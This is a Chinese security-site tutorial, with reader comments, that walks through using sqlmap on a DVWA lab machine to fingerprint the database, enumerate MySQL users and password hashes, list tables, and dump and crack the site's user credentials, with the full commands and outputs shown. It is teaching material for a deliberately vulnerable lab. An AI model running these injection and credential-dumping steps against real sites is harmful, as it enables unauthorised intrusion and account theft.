FB招聘站
分类阅读
专栏
公开课
企业服务
用户服务
手机版
搜索
投稿
登录
注册
SQL注入之SQLmap入门Taskiller2014-03-27金币奖励+19共9630874人围观 ,发现 53 个不明物体WEB安全
什么是SQLmap?
SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。
读者可以通过位于SourceForge的官方网站下载SQLmap源码:http://sourceforge.net/projects/sqlmap/
SQLmap的作者是谁?
Bernardo DameleAssumpcao Guimaraes (@inquisb),读者可以通过bernardo@sqlmap.org与他取得联系,以及Miroslav Stampar (@stamparm)读者可以通过miroslav@sqlmap.org与他联系。
同时读者也可以通过dev@sqlmap.org与SQLmap的所有开发者联系。
执行SQLmap的命令是什么?
进入sqlmap.py所在的目录,执行以下命令:
#python sqlmap.py -h
(译注:选项列表太长了,而且与最新版本有些差异,所以这里不再列出,请读者下载最新版在自己机器上看吧)
SQLmap命令选项被归类为目标(Target)选项、请求(Request)选项、优化、注入、检测、技巧(Techniques)、指纹、枚举等。
如何使用SQLmap:
为方便演示,我们创建两个虚拟机:
1、受害者机器, windows XP操作系统,运行一个web服务器,同时跑着一个包含漏洞的web应用(DVWA)。
2、攻击器机器,使用Ubuntu 12.04,包含SQLmap程序。
本次实验的目的:使用SQLmap得到以下信息:
3、枚举MYSQL用户名与密码。
4、枚举所有数据库。
5、枚举指定数据库的数据表。
6、枚举指定数据表中的所有用户名与密码。
使用SQLmap之前我们得到需要当前会话cookies等信息,用来在渗透过程中维持连接状态,这里使用Firefox中名为“TamperData”的add-on获取。
SQL入门
当前得到的cookie为“security=high;PHPSESSID=57p5g7f32b3ffv8l45qppudqn3″。
为方便演示,我们将DVWA安全等级设置为low:
SQL入门
接下来我们进入页面的“SQL Injection”部分,输入任意值并提交。可以看到get请求的ID参数如下:
“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”
因此该页面就是我们的目标页面。
以下命令可以用来检索当前数据库和当前用户:
“./sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -b –current-db –current-user”
使用选项:
1、–cookie : 设置我们的cookie值“将DVWA安全等级从high设置为low”
2、-u : 指定目标URL
3、-b : 获取DBMS banner
4、–current-db : 获取当前数据库
5、–current-user:获取当前用户
结果如下:
SQL入门
可以看到结果如下:
DBMS : MySQLversion 5.0
OS versionUbuntu 12.04
current user:root
current db :DVWA
以下命令用来枚举所有的DBMS用户和密码hash,在以后更进一步的攻击中可以对密码hash进行破解:
“sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” --string=”Surname” --users --password”
使用选项:
1、–string : 当查询可用时用来匹配页面中的字符串
2、–users : 枚举DBMS用户
3、–password : 枚举DBMS用户密码hash
SQL入门
结果如下:
databasemanagement system users [142]:
[*] ”@’kingasmk’
[*]”@’localhost’
[*]‘debian-sys-maint’@'localhost’
[*]‘phpmyadmin’@'localhost’
[*]‘root’@’127.0.0.1′
[*] ‘root’@'::1′
[*]‘root’@'kingasmk’
[*]‘root’@'localhost’
数据库管理系统用户和密码hash:
[*]debian-sys-maint [1]:
password hash:*C30441E06530498BC86019BF3211B94B3BAB295A
[*] phpmyadmin[1]:
password hash:*C30441E06530498BC86019BF3211B94B3BAB295A
[*] root [4]:
password hash: *C30441E06530498BC86019BF3211B94B3BAB295A
password hash:*C30441E06530498BC86019BF3211B94B3BAB295A
password hash:*C30441E06530498BC86019BF3211B94B3BAB295A
password hash:*C30441E06530498BC86019BF3211B94B3BAB295A
读者可以使用Cain&Abel、John&Ripper等工具将密码hash破解为明文。以下命令会枚举系统中所有的数据库schema:
“sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”
--cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” --dbs”
使用选项:
–dbs: 枚举DBMS中的数据库
SQL入门
结果如下:
availabledatabases [5]:
[*]dvwa
[*]information_schema
[*]mysql
[*]performance_schema
[*]phpmyadmin
下面我们尝试枚举DVWA数据表,执行以下命令:
“sqlmap.py-u “http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -D dvwa --tables”
使用选项:
1、-D : 要枚举的DBMS数据库
2、–tables : 枚举DBMS数据库中的数据表
SQL入门
得到结果如下:
Database: dvwa
[2 tables]
+————+
| guestbook |
| users |
+————+
下面获取用户表的列,命令如下:
“sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -D dvwa -T users --columns”
使用选项:
-T : 要枚举的DBMS数据库表
–columns : 枚举DBMS数据库表中的所有列
SQL入门
结果如下:
Database: dvwa
Table: users
[6 columns]
+————+————-+
| Column | Type|
+————+————-+
| avatar |varchar(70) |
| first_name |varchar(15) |
| last_name |varchar(15) |
| password |varchar(32) |
| user |varchar(15) |
| user_id |int(6) |
+————+————-+
如上所示,以上为我们感兴趣的列,表示用户名与密码等。下面将每一列的内容提取出来。执行以下命令,将用户与密码表中的所有用户名与密码dump出来:
“sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”–cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” -D dvwa -T users-C user,password --dump”
使用选项:
-T : 要枚举的DBMS数据表
-C: 要枚举的DBMS数据表中的列
–dump : 转储DBMS数据表项
SQLmap会提问是否破解密码,按回车确认:
SQL入门
得到所有用户名与明文密码如下:
Database: dvwa
Table: users
[5 entries]
+———+———+———————————————+
| user_id | user| password |
+———+———+———————————————+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99(password) |
| 2 | gordonb |e99a18c428cb38d5f260853678922e03 (abc123) |
| 3 | 1337 |8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| 4 | pablo |0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
| 5 | smithy |5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+———+———+———————————————+
这时我们就可以利用admin帐户登录做任何事了。
总结:
SQLmap是一个非常强大的工具,可以用来简化操作,并自动处理SQL注入检测与利用。
[via infosecinstitute]
更多精彩# events# SqlMap# SQL注入
Taskiller
Taskiller
29 篇文章
等级: 5级
||
相关推荐
Web应用手工渗透测试——用SQLMap进行SQL盲注测试
SQL注入工具 – sqlcake
新手渗透测试训练营——SQL注入
ruby写的SQL注入工具-sqlcake 1.1 发布
FreeBuf公开课:轻松的方式科普什么是SQL注入攻击(第一集)
SQLiv:一款批量SQL注入漏洞扫描工具
你没看错!SQLMap v1.3.10正式发布!
Java GUI界面SQL注入工具 – JSQL
这些评论亮了
那个疼(1级)回复
刚才有个三炮告诉我SQLMAP是扫端口的,真他妈逗,SQLMAP是扫网站目录的好嘛?笑死我了,真想一嘴巴子呼死他.我记得SQLMAP是Hades在<<来自星星的你>>中使用最经典的系统,从而一举成名,被京东CEO李开复收购,于某年某月成功进军<<天天向上>>,凭着一首对女朋友的思念的高歌,而闻名世界.
)254(亮了
WeirdBird007(3级)干过开发,日过渗透,某乙方渗透>_< '...回复 wooyun 发过 两篇 更详细的。。。 http://drops.wooyun.org/tips/143 http://drops.wooyun.org/tips/401 )52(亮了 EvilPing(1级)回复 我以为sqlmap是地图那... )35(亮了 敲什么呢i(1级)回复 重复造轮子 )24(亮了 sam回复 @lisp 就是发了 freebuf也会审核你的文字格式 排版 措辞 你懂得 后来还是不发了 )18(亮了 发表评论已有 53 条评论 浩天寰宇 (3级)猴子是我请来的逗比~ 2014-03-27回复1楼 ubuntu那个边框是单加上去的吗? 亮了(6) abcd (1级) 2014-03-27回复 @浩天寰宇 vm有这功能 亮了(9) yyyy3333 2014-03-28回复 @abcd 传说叫 无缝结合 亮了(4) 浩天寰宇 (3级)猴子是我请来的逗比~ 2014-03-31回复 @abcd 我能在KALI下加这么一个条吗 亮了(7) kaliplayer (1级) 2017-04-16回复 @ 浩天寰宇 那个,kali2.0就有边框,不信你试试 亮了(1) 请叫我伪大神 2014-04-09回复 @浩天寰宇 这是ubuntu的桌面,骚年多读读课本 亮了(9) Sarshes 2015-07-02回复 @ 请叫我伪大神 孩子,多读读书… 亮了(4) MeirLin (5级)研表究明,汉字的序顺并不定一能影阅响读,比如当你看完这句话后... 2014-03-27回复2楼 很好的普及。 亮了(9) mmtt (4级) 2014-03-27回复3楼 渗透必备神器 亮了(5) WeirdBird007 (3级)干过开发,日过渗透,某乙方渗透>_< '... 2014-03-27回复4楼 wooyun 发过 两篇 更详细的。。。 http://drops.wooyun.org/tips/143 http://drops.wooyun.org/tips/401 亮了(52) Taskiller (5级) 2014-03-28回复 @WeirdBird007 那两篇详细讲解了各个选项的意思、用法,这一篇是一个简单的具体实例,我个人不认为这是冲突的 亮了(9) lisp 2014-03-27回复5楼 希望可以多发表些技巧和专业性更强的文章 sqlmap很多高级用法和高级场景,从来没见人发表 我想很多人研究过sqlmap的源码 但是没人发个文 又不是做黑产,没必要藏着掖着 亮了(4) sam 2014-03-28回复 @lisp 就是发了 freebuf也会审核你的文字格式 排版 措辞 你懂得 后来还是不发了 亮了(18) 敲什么呢i (1级) 2014-03-27回复6楼 重复造轮子 亮了(24) Flincllck (1级) 2014-03-27回复7楼 这个不是 metasploit魔鬼训练营 里面的案例讲解吗? 亮了(2) Taskiller (5级) 2014-03-28回复 @Flincllck 没有买这本书,请帮忙确认一下,谢谢,如果这篇文章确实和书上的东西都一样,我会联系小编请他把这篇文章拿掉。 亮了(6) luom 2014-03-27回复8楼 –suffix –perfix –os-pwn –threads 呢? 这些简单的功能 百度 一大推 亮了(2) 李彦宏 2014-03-28回复9楼 终于见到map了,在茫茫盘海中,我就把服务器权限给你,没个一二百年你也拖不完呀~~~ 亮了(8) lisp 2014-03-28回复 @李彦宏 亲爱的,不解释 亮了(4) tink 2014-03-28回复10楼 这是是明目张胆发文刷币吗 亮了(5) ovens (3级) 2014-03-28回复11楼 这也可以过? 明天我也刷币玩玩 亮了(3) evan-css (1级) 2014-03-28回复12楼 有没有DVWA High级别的SQLMap使用方法? 亮了(3) xiao_hen (4级)人是无法在快乐中成长的。快乐只能使人肤浅,我们在痛苦中成长,... 2014-03-28回复 @evan-css 哈,一块期待。 亮了(2) chenyoufu123 2014-03-28回复13楼 haoba, wo juede ma shang jiu lun wei heike jidi de shui ping le 亮了(3) 周鸿祎 2014-03-28回复14楼 搞什么飞机! http://resources.infosecinstitute.com/sql-injection/ 亮了(7) April_2nd 2014-03-28回复15楼 为什么我下载的源码会报错呢 File "./sqlmap.py", line 119 finally: ^ SyntaxError: invalid syntax 亮了(5) downtown 2017-07-18回复 @ April_2nd python版本过低,不支持finally关键字 亮了(0) mark 2014-03-28回复16楼 雨夜Climb,收藏成功。请访问 稍后再读! 你可以关注 获得私信提醒。 亮了(1) 带脚镣跳舞 2014-03-28回复17楼 威武 亮了(2) 雨夜Climb 2014-03-28回复18楼 好! 亮了(1) jinifly 2014-03-28回复19楼 mark 亮了(2) 深圳流浪人008 2014-03-28回复20楼 可爱 亮了(2) 那个疼 (1级) 2014-03-28回复21楼 刚才有个三炮告诉我SQLMAP是扫端口的,真他妈逗,SQLMAP是扫网站目录的好嘛?笑死我了,真想一嘴巴子呼死他.我记得SQLMAP是Hades在<<来自星星的你>>中使用最经典的系统,从而一举成名,被京东CEO李开复收购,于某年某月成功进军<<天天向上>>,凭着一首对女朋友的思念的高歌,而闻名世界.
亮了(254)
whoami 2017-12-10回复
@ 那个疼 他是不是以为是nmap
亮了(1)
pinnnk。 (3级) 2014-03-31回复22楼
要是有windows下的 就更好了~
亮了(3)
无才布衣 (4级) 2014-04-01回复
@pinnnk。 sqlmap win下也可以用的
亮了(2)
alex57xp32 (1级) 2014-07-18回复
@pinnnk。 sqlmap是python。。懂嘛,跨平台的。
亮了(2)
expertwk (1级) 2014-04-01回复23楼
good!
亮了(2)
chenyoufu123 2014-04-01回复24楼
谁牛逼发个dvwa high级别的sqli注入上来
亮了(7)
浩天寰宇 (3级)猴子是我请来的逗比~ 2014-04-10回复
@chenyoufu123 同求
亮了(3)
chenyoufu123 2014-04-01回复25楼
为什么这个文章有19个金币?
亮了(2)
MeirLin (5级)研表究明,汉字的序顺并不定一能影阅响读,比如当你看完这句话后... 2014-04-01回复26楼
- – +19的金币是如何考虑的?
亮了(4)
FB客服 认证作者(9级)FreeBuf官方客服 2014-04-01回复
@MeirLin FB有专门的文章评审团队,评审组里每个成员会对每篇需要加金币的文章进行评分,最后取平均值作为该文的最终得分。
亮了(3)
EvilPing (1级) 2014-04-05回复27楼
我以为sqlmap是地图那…
亮了(35)
蛋蛋一号_ 2014-04-13回复28楼
转发微博
亮了(2)
seeyoulater 2014-05-19回复29楼
sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”–cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” -D dvwa -T users-C user,password –dump
users和-C之间少了一个空格
亮了(6)
VINCE67 (1级) 2014-06-04回复30楼
nice
亮了(1)
mudongliangabcd (2级)信息安全方向研究生,Debian使用者及拥护者! 2015-05-30回复31楼
按照作者的方法去做第一步就没有成功!我用的官方的owasp虚拟机!这个版本在进入sqli时有一个登录的过程!
亮了(5)
zoonctrl (6级)该怎么做好信息安全? 2015-10-08回复32楼
写的比较简单
亮了(3)
bluerainerz (1级) 2016-01-27回复33楼
看来注入还是的使用linux系统才够高端。
亮了(3)
buildall (1级) 2016-11-28回复34楼
以下命令可以用来检索当前数据库和当前用户:
“./sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -b –current-db –current-user”
那个cookie的前面缺了个杠杠。。
亮了(4)
Bur_Ning (1级)小白一枚 大神多指教 2017-06-12回复35楼
新人一枚,按照文章做了一遍,有收获。 :roll:
亮了(0)
Abraham·Cong (1级) 2017-07-17回复36楼
分享的文件被人删除了
亮了(3)
昵称
请输入昵称
必须您当前尚未登录。登录?注册邮箱
请输入邮箱地址
必须(保密)表情插图
有人回复时邮件通知我
Taskiller
Taskiller
这家伙太懒,还未填写个人描述!
29
文章数
14
评论数
1
关注者
关注
最近文章
玩转Google的XSS游戏
2014.06.09
使用portspoof调戏网络攻击者
2014.05.14
开源BUG跟踪平台JIRA目录遍历漏洞分析
2014.05.14
浏览更多
文章目录
什么是SQLmap?
SQLmap的作者是谁?
执行SQLmap的命令是什么?
如何使用SQLmap:
使用选项:
使用选项:
使用选项:
使用选项:
使用选项:
相关阅读
FireEye:2013年度APT攻击报告这位俄罗斯赌场黑客通过破解老虎机赚了几百万美元(下集)对S-CMS的一次全面审计关注漏洞盒子订阅号,即有机会获取门票 FREE TALK•北京站超详细SQLMap使用攻略及技巧分享
推荐关注
官方公众号
聚焦企业安全
官方QQ群 FreeBuf官方微博
文章目录
什么是SQLmap?
SQLmap的作者是谁?
执行SQLmap的命令是什么?
如何使用SQLmap:
使用选项:
使用选项:
使用选项:
使用选项:
使用选项:
活动预告
3月
纯实战化攻防教学 | 玩转黑客操作系统Blackarch
已结束
3月
合规、技术、实践,从隐私保护走向数据安全
已结束
3月
冠军选手帮你把CTF知识点各个击破
已结束
3月
CTF之web安全入门
已结束
本站由阿里云 提供计算与安全服务
官方QQ群:590717869
用户服务有奖投稿申请专栏提交漏洞参与众测商城企业服务甲方会员厂商会员企业空间企业SRC漏洞众测智能安全合作信息寻求报道广告投放联系我们友情链接关于我们关于我们加入我们
微信公众号
新浪微博赞助商
FreeBuf+小程序
扫码把安全装进口袋
斗象科技FreeBuf漏洞盒子斗象智能安全平台免责条款协议条款Copyright © 2020 WWW.FREEBUF.COM All Rights Reserved 沪公网安备 31011502009321号
css.php正在加载中...0daybank
文章评论